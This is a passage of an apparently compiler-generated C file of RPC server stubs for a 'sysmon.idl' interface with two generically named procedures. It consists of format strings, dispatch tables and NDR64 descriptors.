sysmon__MIDL_TypeFormatString;\r\nextern const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString;\r\nextern const sysmon_MIDL_EXPR_FORMAT_STRING sysmon__MIDL_ExprFormatString;\r\n\r\n/* Standard interface: DefaultIfName, ver. 1.0,\r\n   GUID={0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}} */\r\n\r\n\r\nextern const MIDL_SERVER_INFO DefaultIfName_ServerInfo;\r\n\r\nextern const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable;\r\n\r\nstatic const RPC_SERVER_INTERFACE DefaultIfName___RpcServerInterface =\r\n    {\r\n    sizeof(RPC_SERVER_INTERFACE),\r\n    {{0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}},{1,0}},\r\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\r\n    (RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable,\r\n    0,\r\n    0,\r\n    0,\r\n    &DefaultIfName_ServerInfo,\r\n    0x06000000\r\n    };\r\nRPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcServerInterface;\r\n\r\nextern const MIDL_STUB_DESC DefaultIfName_StubDesc;\r\n\r\n\r\n#if !defined(__RPC_WIN64__)\r\n#error  Invalid build platform for this stub.\r\n#endif\r\n\r\nstatic const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString =\r\n    {\r\n        0,\r\n        {\r\n\r\n\t/* Procedure Proc0 */\r\n\r\n\t\t\t0x0,\t\t/* 0 */\r\n\t\t\t0x48,\t\t/* Old Flags:  */\r\n/*  2 */\tNdrFcLong( 0x0 ),\t/* 0 */\r\n/*  6 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/*  8 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\r\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\r\n\t\t\t0x0,\t\t/* 0 */\r\n/* 12 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\r\n/* 14 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\r\n/* 18 */\t0x44,\t\t/* Oi2 Flags:  has return, has ext, */\r\n\t\t\t0x1,\t\t/* 1 */\r\n/* 20 */\t0xa,\t\t/* 10 */\r\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\r\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 28 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n\r\n\t/* Return value */\r\n\r\n/* 30 */\tNdrFcShort( 0x70 ),\t/* Flags:  out, return, base type, */\r\n/* 32 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\r\n/* 34 */\t0x8,\t\t/* FC_LONG */\r\n\t\t\t0x0,\t\t/* 0 */\r\n\r\n\t/* Procedure Proc1 */\r\n\r\n/* 36 */\t0x0,\t\t/* 0 */\r\n\t\t\t0x48,\t\t/* Old Flags:  */\r\n/* 38 */\tNdrFcLong( 0x0 ),\t/* 0 */\r\n/* 42 */\tNdrFcShort( 0x1 ),\t/* 1 */\r\n/* 44 */\tNdrFcShort( 0x18 ),\t/* X64 Stack size/offset = 24 */\r\n/* 46 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\r\n\t\t\t0x0,\t\t/* 0 */\r\n/* 48 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\r\n/* 50 */\tNdrFcShort( 0x8 ),\t/* 8 */\r\n/* 52 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 54 */\t0x42,\t\t/* Oi2 Flags:  clt must size, has ext, */\r\n\t\t\t0x2,\t\t/* 2 */\r\n/* 56 */\t0xa,\t\t/* 10 */\r\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\r\n/* 58 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 60 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 62 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 64 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n\r\n\t/* Parameter arg_0 */\r\n\r\n/* 66 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\r\n/* 68 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\r\n/* 70 */\t0x8,\t\t/* FC_LONG */\r\n\t\t\t0x0,\t\t/* 0 */\r\n\r\n\t/* Parameter arg_1 */\r\n\r\n/* 72 */\tNdrFcShort( 0x10b ),\t/* Flags:  must size, must free, in, simple ref, */\r\n/* 74 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\r\n/* 76 */\tNdrFcShort( 0x4 ),\t/* Type Offset=4 */\r\n\r\n\t\t\t0x0\r\n        }\r\n    };\r\n\r\nstatic const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString =\r\n    {\r\n        0,\r\n        {\r\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/*  2 */\t\r\n\t\t\t0x11, 0x8,\t/* FC_RP [simple_pointer] */\r\n/*  4 */\t\r\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\r\n\t\t\t0x5c,\t\t/* FC_PAD */\r\n\r\n\t\t\t0x0\r\n        }\r\n    };\r\n\r\nstatic const unsigned short DefaultIfName_FormatStringOffsetTable[] =\r\n    {\r\n    0,\r\n    36\r\n    };\r\n\r\n\r\nstatic const RPC_DISPATCH_FUNCTION DefaultIfName_table[] =\r\n    {\r\n    NdrServerCall2,\r\n    NdrServerCall2,\r\n    0\r\n    };\r\nstatic const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable = \r\n    {\r\n    2,\r\n    (RPC_DISPATCH_FUNCTION*)DefaultIfName_table\r\n    };\r\n\r\n\r\n#endif /* defined(_M_AMD64)*/\r\n\r\n\r\n\r\n/* this ALWAYS GENERATED file contains the RPC server stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n#if defined(_M_AMD64)\r\n\r\n\r\n\r\n\r\n#if !defined(__RPC_WIN64__)\r\n#error  Invalid build platform for this stub.\r\n#endif\r\n\r\n\r\n#include \"ndr64types.h\"\r\n#include \"pshpack8.h\"\r\n\r\n\r\ntypedef \r\nstruct _NDR64_CONFORMANT_STRING_FORMAT\r\n__midl_frag7_t;\r\nextern const __midl_frag7_t __midl_frag7;\r\n\r\ntypedef \r\nstruct _NDR64_POINTER_FORMAT\r\n__midl_frag6_t;\r\nextern const __midl_frag6_t __midl_frag6;\r\n\r\ntypedef \r\nNDR64_FORMAT_CHAR\r\n__midl_frag5_t;\r\nextern const __midl_frag5_t __midl_frag5;\r\n\r\ntypedef \r\nstruct \r\n{\r\n    struct _NDR64_PROC_FORMAT frag1;\r\n    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;\r\n    struct _NDR64_PARAM_FORMAT frag3;\r\n    struct _NDR64_PARAM_FORMAT frag4;\r\n}\r\n__midl_frag4_t;\r\nextern const __midl_frag4_t __midl_frag4;\r\n\r\ntypedef \r\nstruct \r\n{\r\n    struct _NDR64_PROC_FORMAT frag1;\r\n    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;\r\n    struct _NDR64_PARAM_FORMAT frag3;\r\n}\r\n__midl_frag2_t;\r\nextern const __midl_frag2_t __midl_frag2;\r\n\r\ntypedef \r\nNDR64_FORMAT_UINT32\r\n__midl_frag1_t;\r\nextern const __midl_frag1_t __midl_frag1;\r\n\r\nstatic const __midl_frag7_t __midl_frag7 =\r\n{ \r\n/* *wchar_t */\r\n    { \r\n    /* *wchar_t */\r\n        0x64,    /* FC64_CONF_WCHAR_STRING */\r\n        { \r\n        /* *wchar_t */\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0\r\n        },\r\n        (NDR64_UINT16) 2 /* 0x2 */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag6_t __midl_frag6 =\r\n{ \r\n/* *wchar_t */\r\n    0x20,    /* FC64_RP */\r\n    (NDR64_UINT8) 0 /* 0x0 */,\r\n    (NDR64_UINT16) 0 /* 0x0 */,\r\n    &__midl_frag7\r\n};\r\n\r\nstatic const __midl_frag5_t __midl_frag5 =\r\n0x5    /* FC64_INT32 */;\r\n\r\nstatic const __midl_frag4_t __midl_frag4 =\r\n{ \r\n/* Proc1 */\r\n    { \r\n    /* Proc1 */      /* procedure Proc1 */\r\n        (NDR64_UINT32) 17039424 /* 0x1040040 */,    /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasExtensions */\r\n        (NDR64_UINT32) 24 /* 0x18 */ ,  /* Stack size */\r\n        (NDR64_UINT32) 8 /* 0x8 */,\r\n        (NDR64_UINT32) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 2 /* 0x2 */,\r\n        (NDR64_UINT16) 8 /* 0x8 */\r\n    },\r\n    { \r\n    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n        { \r\n        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n            0x72,    /* FC64_BIND_PRIMITIVE */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            0 /* 0x0 */,   /* Stack offset */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            (NDR64_UINT8) 0 /* 0x0 */\r\n        },\r\n        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */\r\n    },\r\n    { \r\n    /* arg_0 */      /* parameter arg_0 */\r\n        &__midl_frag5,\r\n        { \r\n        /* arg_0 */\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            1,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* [in], Basetype, ByValue */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        8 /* 0x8 */,   /* Stack offset */\r\n    },\r\n    { \r\n    /* arg_1 */      /* parameter arg_1 */\r\n        &__midl_frag7,\r\n        { \r\n        /* arg_1 */\r\n            1,\r\n            1,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* MustSize, MustFree, [in], SimpleRef */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        16 /* 0x10 */,   /* Stack offset */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag2_t __midl_frag2 =\r\n{ \r\n/* Proc0 */\r\n    { \r\n    /* Proc0 */      /* procedure Proc0 */\r\n        (NDR64_UINT32) 17301568 /* 0x1080040 */,    /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */\r\n        (NDR64_UINT32) 16 /* 0x10 */ ,  /* Stack size */\r\n        (NDR64_UINT32) 0 /* 0x0 */,\r\n        (NDR64_UINT32) 8 /* 0x8 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 1 /* 0x1 */,\r\n        (NDR64_UINT16) 8 /* 0x8 */\r\n    },\r\n    { \r\n    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n        { \r\n        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n            0x72,    /* FC64_BIND_PRIMITIVE */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            0 /* 0x0 */,   /* Stack offset */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            (NDR64_UINT8) 0 /* 0x0 */\r\n        },\r\n        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */\r\n    },\r\n    { \r\n    /* long */      /* parameter long */\r\n        &__midl_frag5,\r\n        { \r\n        /* long */\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            1,\r\n            1,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* [out], IsReturn, Basetype, ByValue */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        8 /* 0x8 */,   /* Stack offset */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag1_t __midl_frag1 =\r\n(NDR64_UINT32) 0 /* 0x0 */;\r\n\r\n\r\n#include \"poppack.h\"\r\n\r\n\r\nstatic const FormatInfoRef DefaultIfName_Ndr64ProcTable[] =\r\n    {\r\n    &__midl_frag2,\r\n    &__midl_frag4\r\n    };\r\n\r\n\r\nstatic const MIDL_STUB_DESC DefaultIfName_StubDesc = \r\n    {\r\n    (void *)& DefaultIfName___RpcServerInterface,\r\n    MIDL_user_allocate,\r\n    MIDL_user_free,\r\n    0,\r\n    0,\r\n    0,\r\n    0,\r\n    0,\r\n    sysmon__MIDL_TypeFormatString.Format,\r\n    1, /* -error bounds_check flag */\r\n    0x60001, /* Ndr library version */\r\n    0,\r\n    0x801026e, /* MIDL Version 8.1.622 */\r\n    0,\r\n    0,\r\n    0,  /* notify & notify_flag routine table */\r\n    0x2000001, /* MIDL flag */\r\n    0, /* cs routines */\r\n    (void *)& DefaultIfName_ServerInfo,   /* proxy/server info */\r\n    0\r\n    };\r\n\r\nstatic const RPC_DISPATCH_FUNCTION DefaultIfName_NDR64__table[] =\r\n    {\r\n    NdrServerCallAll,\r\n    NdrServerCallAll,\r\n    0\r\n    };\r\nstatic const RPC_DISPATCH_TABLE DefaultIfName_NDR64__v1_0_DispatchTable = \r\n    {\r\n    2,\r\n    (RPC_DISPATCH_FUNCTION*)DefaultIfName_NDR64__table\r\n    };\r\n\r\nstatic const MIDL_SYNTAX_INFO DefaultIfName_SyntaxInfo [  2 ] = \r\n    {\r\n    {\r\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\r\n    (RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable,\r\n    sysmon__MIDL_ProcFormatString.Format,\r\n    DefaultIfName_FormatStringOffsetTable,\r\n    sysmon__MIDL_TypeFormatString.Format,\r\n    0,\r\n    0,\r\n    0\r\n    }\r\n    ,{\r\n    {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}},\r\n    (RPC_DISPATCH_TABLE*)&DefaultIfName_NDR64__v1_0_DispatchTable,\r\n    0 ,\r\n    (unsigned short *) DefaultIfName_Ndr64ProcTable,\r\n    0,\r\n    0,\r\n    0,\r\n    0\r\n    }\r\n    };\r\n\r\n\r\nstatic const SERVER_ROUTINE DefaultIfName_ServerRoutineTable[] = \r\n    {\r\n    (SERVER_ROUTINE)Proc0,\r\n    (SERVER_ROUTINE)Proc1\r\n    };\r\n\r\nstatic const MIDL_SERVER_INFO DefaultIfName_ServerInfo = \r\n    {\r\n    &DefaultIfName_StubDesc,\r\n    DefaultIfName_ServerRoutineTable,\r\n    sysmon__MIDL_ProcFormatString.Format,\r\n    (unsigned short *) DefaultIfName_FormatStringOffsetTable,\r\n    0,\r\n    (RPC_SYNTAX_IDENTIFIER*)&_NDR64_RpcTransferSyntax,\r\n    2,\r\n    (MIDL_SYNTAX_INFO*)DefaultIfName_SyntaxInfo\r\n    };\r\n#if _MSC_VER >= 1200\r\n#pragma warning(pop)\r\n#endif\r\n\r\n\r\n#endif /* defined(_M_AMD64)*/\r\n\r\n"
  }
]